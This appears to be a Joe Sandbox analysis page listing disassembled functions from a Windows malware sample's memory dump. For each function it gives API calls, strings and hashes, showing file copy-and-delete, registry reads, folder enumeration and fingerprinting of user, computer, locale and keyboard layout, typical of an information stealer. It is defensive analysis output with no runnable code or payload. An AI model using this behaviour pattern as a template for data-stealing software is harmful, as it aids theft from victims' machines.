Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: 807d1a8c60ec46bf374704b59fd0ccc8b18b230b7b558d1a499820440742b74a
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: 807d1a8c60ec46bf374704b59fd0ccc8b18b230b7b558d1a499820440742b74a
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

"" , xrefs: 004111DC
.dll, xrefs: 00411054
<, xrefs: 004112AC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 4eb6d38009e4268714a703d91e073a73371bb23bb8bdfb4da96119e8d02b733f
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 4eb6d38009e4268714a703d91e073a73371bb23bb8bdfb4da96119e8d02b733f
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04286730), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,0427FB10), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,042872F8), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6BA2C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BA2C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BA2C969
GetSystemInfo.KERNEL32(?), ref: 6BA2C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BA2C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BA2C9E2

Memory Dump Source

Source File: 00000001.00000002.2187714449.000000006BA11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BA10000, based on PE: true

Associated: 00000001.00000002.2187694084.000000006BA10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187802470.000000006BA9E000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187822727.000000006BAA2000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba10000_u5mc.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 185552e90455416884e03e7631c6d59587e594880edef63ff4c080f32bfd0811
Instruction ID: b1864e5404f8d2cb6ea1897257d30cbf822eda8d9684ee00d0f194b7986fcf74
Opcode Fuzzy Hash: 185552e90455416884e03e7631c6d59587e594880edef63ff4c080f32bfd0811
Instruction Fuzzy Hash: 12210A71654314ABDF04AB24CC85BAE7369FB46B00F54411EF906A7240EF75EC868790

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,04280B38), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,042826C0,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04287258,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,04282880,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04286C70,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(04280908,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(04287418,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(04280908,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: d3e625e4d82f5ecb9b80f8cc5c09ca908439cfe618f2818e3558033358e63cbb
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: d3e625e4d82f5ecb9b80f8cc5c09ca908439cfe618f2818e3558033358e63cbb
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 004065DD, 004065FD, 0040667F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04287A20,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9968e1413d0211feb28b095140a787b815c7b74059ff12fed80035ae3a4b7dc8
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: 9968e1413d0211feb28b095140a787b815c7b74059ff12fed80035ae3a4b7dc8
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,04282880,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04286C70,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,042873B8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04280B08), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,042873B8,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04280B08), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,042808A8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04286D18,00000000,?,0041D758,00000000,?,00000000,00000000,?,042874B8,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04286D18,00000000,?,0041D758,00000000,?,00000000,00000000,?,042874B8,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

